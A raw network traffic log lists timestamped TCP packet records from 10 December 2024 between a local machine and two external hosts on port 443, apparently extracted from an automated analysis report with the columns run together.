                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.084768057 CET44349776162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.084846020 CET49776443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.084870100 CET44349776162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.084904909 CET49776443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.097089052 CET44349776162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.097146988 CET49776443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.097162962 CET44349776162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.097309113 CET49776443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.126902103 CET49776443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.753427982 CET49790443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.753477097 CET44349790162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.753741980 CET49790443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.759681940 CET49790443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.759694099 CET44349790162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:44.178663015 CET44349790162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:44.225366116 CET49790443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:44.225402117 CET44349790162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.354279995 CET44349790162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.354358912 CET44349790162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.354377985 CET49790443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.354439974 CET49790443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.366240025 CET49790443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.721302986 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.721347094 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.721441984 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.721951962 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.721965075 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:47.143692017 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:47.143784046 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:47.143814087 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:47.143877983 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:47.150129080 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:47.150141954 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:47.150449038 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:47.157286882 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:47.199326992 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.176726103 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.176749945 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.176765919 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.176876068 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.176888943 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.176965952 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.290337086 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.290384054 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.290433884 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.290451050 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.290458918 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.290489912 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.290489912 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.347088099 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.347116947 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.347153902 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.347163916 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.347199917 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.398354053 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.464396000 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.464420080 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.464443922 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.464473963 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.464505911 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.464526892 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.464560986 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.464581966 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.493427038 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.493455887 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.493549109 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.493558884 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.493597984 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.518400908 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.518435001 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.518501997 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.518501997 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.518513918 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.518552065 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.522483110 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.562313080 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.562340975 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.562386036 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.562396049 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.562447071 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.649840117 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.649866104 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.649904966 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.649914026 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.649954081 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.669461966 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.669476986 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.669495106 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.669502020 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.669542074 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.669550896 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.669573069 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.685836077 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.685849905 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.685882092 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.685890913 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.685895920 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.685915947 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.685955048 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.697351933 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.697393894 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.697406054 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.697433949 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.697438002 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.697448969 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.697547913 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.708954096 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.708966017 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.708987951 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.709018946 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.709043980 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.709069014 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.709083080 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.709083080 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.719088078 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.719118118 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.719166994 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.719178915 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.719213963 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.827347040 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.827377081 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.827436924 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.827455044 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.827474117 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.836502075 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.836523056 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.836544991 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.836570024 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.836582899 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.836596966 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.836602926 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.836625099 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.836647034 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.836647034 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.846131086 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.846167088 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.846203089 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.846205950 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.846230030 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.846241951 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.846257925 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.846309900 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.854743004 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.854768038 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.854801893 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.854878902 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.854887962 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.854922056 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.862298965 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.862320900 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.862441063 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.862441063 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.862451077 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.872060061 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.872083902 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.872133970 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.872154951 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.872168064 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.879635096 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.879652977 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.880160093 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.880168915 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.888349056 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.888386011 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.888462067 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.888472080 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.888484955 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.992474079 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.019530058 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.019545078 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.019572020 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.019589901 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.019607067 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.019610882 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.019613981 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.019675016 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.026036024 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.026046038 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.026067972 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.026077986 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.026120901 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.026134014 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.026171923 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.026171923 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.033776999 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.033787012 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.033814907 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.033849955 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.033863068 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.033962011 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.041192055 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.041219950 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.041347027 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.041347027 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.041362047 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.041572094 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.047779083 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.047796011 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.047867060 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.047874928 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.047960043 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.055876970 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.055892944 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.055934906 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.055943012 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.055989981 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.055989981 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.062664986 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.062681913 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.062741041 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.062756062 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.062810898 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.070070982 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.070091009 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.070152998 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.070166111 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.070197105 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.070211887 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.079742908 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.211728096 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.211750984 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.211792946 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.211805105 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.211865902 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.211865902 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.218247890 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.218267918 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.218348980 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.218358040 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.218373060 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.218473911 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.225816965 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.225856066 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.225922108 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.225922108 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.225929976 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.226051092 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.227524996 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.233383894 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.233407021 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.233474970 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.233484983 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.233613014 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.240022898 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.240041018 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.240094900 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.240104914 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.240114927 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.240175962 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.248049974 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.248069048 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.248121023 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.248132944 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.248179913 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.248363972 CET49795443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.254703045 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.254724979 CET44349795162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.254781961 CET49795443192.168.2.4162.125.69.15
